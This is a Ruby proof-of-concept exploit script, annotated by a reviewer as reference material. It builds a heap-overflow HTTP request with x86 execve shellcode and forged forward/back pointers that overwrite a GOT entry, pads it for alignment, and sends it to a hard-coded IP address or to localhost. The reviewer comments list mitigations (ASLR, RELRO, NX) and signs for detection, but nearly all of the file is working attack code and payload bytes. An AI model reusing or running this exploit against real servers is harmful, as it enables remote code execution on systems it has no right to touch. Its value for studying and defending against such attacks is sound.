# Proof-of-concept request generator (Ruby), kept as a reference for analysis.
#
# What the code below does:
#   1. Builds `sc`: raw x86 bytes followed by one ASCII string holding
#      "/etc/validnivo", "jj" and "john@ofjj.net", separated by '+' fillers.
#      Per the author's annotations, the code NUL-terminates the three fields
#      at run time and passes them to execve.
#   2. Packs two 32-bit values (fd, bk) derived from hard-coded addresses,
#      appends a marker and the payload, then pads to a fixed length/alignment.
#   3. Sends the result as the query string of a single HTTP/1.0 GET on port 80.
#
# Command-line words recognised (matched anywhere in ARGV):
#   bufaddr0x<hex>, docrootlen<n>, deadbabe, print, local
#
# NOTE(review): `fd = gotfree - 12` paired with a `bk` that points into the
# request buffer looks like the forward/back pointer pair of a classic
# allocator-unlink overwrite aimed at a GOT slot. This is inferred from the
# variable names and arithmetic only; confirm against the target binary.
# NOTE(review): the approach presumably depends on fixed load addresses, a
# writable GOT and an executable data buffer. ASLR/PIE, full RELRO, NX and
# allocators with unlink integrity checks are the corresponding mitigations.
# Detection: the request line carries bytes outside printable ASCII (a run of
# 0x90, the pair 0xcd 0x80), the literal 'suuxoorz', and long 'x' padding.
# All of these are visible to a WAF rule or to access-log review.
require 'socket'

# Payload bytes. Some of the author's inline offsets did not match the encoded
# displacement bytes; the comments below follow the bytes and quote the old note.
sc = "\xeb\x34" <<            # jump callme
"\x5e" <<
"\x89\x76\x70" <<             # argv[0] pointer (author's note said /bin/sh; the string below is /etc/validnivo)
"\x8d\x46\x10" <<             # +3: lea 0x10(%esi), %eax // offset of nick (author's note said 1b)
"\x89\x46\x74" <<             # +3: mov %eax, 74(%esi)
"\x8d\x46\x14" <<             # +3: lea 0x14(%esi), %eax // offset of mail (author's note said 1e)
"\x89\x46\x78" <<             # +3: mov %eax, 78(%esi)
"\x31\xc0" <<
"\x88\x46\x0e" <<             # z-terminate exe
"\x88\x46\x12" <<             # +3: z-terminate nick
"\x88\x46\x21" <<             # +3: z-terminate mail
"\x89\x46\x7c" <<             # *envp = 0
"\xb0\x08" <<                 # %al = 8; the three 0x40 bytes below raise it to 0xb (nr_execve)
"\x40\x40\x40" <<
"\x89\xf3" <<
"\x8d\x4e\x70" <<             # argv=
"\x8d\x56\x7c" <<             # envp=
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd" <<
"\x80\xe8\xc7\xff\xff\xff" << # call back
# "/bin/ls+++++++++-lR+/+"      (earlier string, disabled by the author)
"/etc/validnivo++jj++john@ofjj.net+"
# 0123456789abcdef0123456789abcdef01   <- column ruler for the string above

# Alternative payloads left disabled by the author:
#sc="\x68\x31\x32\x33\x34\x89\xe1\x31\xdb\x43\x31\xd2\x42\x42\x42\x42\x89\xd0\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80"
#sc = "\xf3\x90\xeb\xfc"

# Seven 0x90 bytes, then 0xb8 and four 'x' filler bytes; prepended to `sc` below.
jmpfwd = "\x90\x90\x90\x90\x90\x90\x90\xb8xxxx"

# Hard-coded absolute addresses (NOTE(review): presumably specific to one
# build of the target; they carry no meaning elsewhere).
gotfree = 0x0804af38
bufaddr = 0x0804af70
#bufaddr = 0x0804afb8
# Override from the command line. The "0x" group in the pattern is not
# optional, so only the form bufaddr0x<hex> matches.
bufaddr = $1.hex if ARGV.join =~ /bufaddr(?:0x)([a-fA-F0-9]{0,8})/

fd = gotfree - 12
# here that creates a space, which make apache fuck everything up => +8
bk = bufaddr + 0x18 + 8

#cgi = [fd, bk].pack('LL')
# must be a valid dir/file (otherwise apache blocks us before hitting the cgi)
cgi = ''

# Query string layout: fd, bk (native-endian 32-bit each), an 8-byte marker,
# then jmpfwd + sc.
req = [fd, bk].pack('LL') + 'suuxoorz'
req += (jmpfwd + sc)
# Pad with 'x' to 252 bytes (minus the cgi path), then append 0x30303030 and
# one more 'x'.
req = req.ljust(252-cgi.length, 'x') + [0x30303030].pack('L') + 'x'

# Length of a path prefix that is only used in the alignment arithmetic below
# (presumably the server's document root; confirm). Default 31, overridable
# with docrootlen<n>.
docrootlen = 31
docrootlen = $1.to_i if ARGV.join =~ /docrootlen(\d+)/
# Keep appending 'x' until the combined length is congruent to 4 modulo 8.
req << 'x' while (docrootlen + cgi.length + req.length) % 8 != 4

fullreq = cgi + '?' + req
# 'deadbabe' replaces the whole request with '?' plus a 4-byte marker value.
fullreq = '?'+[0xdeadbabe].pack('L') if ARGV.include? 'deadbabe'

# Report space, TAB, LF, VT, FF, CR or NUL anywhere in the request. This only
# prints a message; the script carries on and still sends the request.
[0x20, 0x9, 0xa, 0xb, 0xc, 0xd, 0x0].each { |c|
  if fullreq.index(c.chr)
    puts "Invalid character #{c.to_s(16)} at #{fullreq.index(c.chr)}"
  end
}

# 'print' writes the raw request to stdout and exits before any network I/O.
if ARGV.include? 'print'
  puts fullreq
  exit
end

#p fullreq
# Hex dump of every request byte, space-separated, for inspection.
puts fullreq.unpack('C*').map{ |e| "%x " % e }.join

# Destination is hard-coded; 'local' switches it to localhost.
host = '193.168.50.87'
host = 'localhost' if ARGV.include? 'local'

# Send one GET and echo whatever comes back, polling ten times 0.1 s apart.
TCPSocket.open(host, 80) { |s|
  s.write "GET #{fullreq} HTTP/1.0\r\n\r\n"
  10.times {
    sleep 0.1
    print s.read
  }
}
puts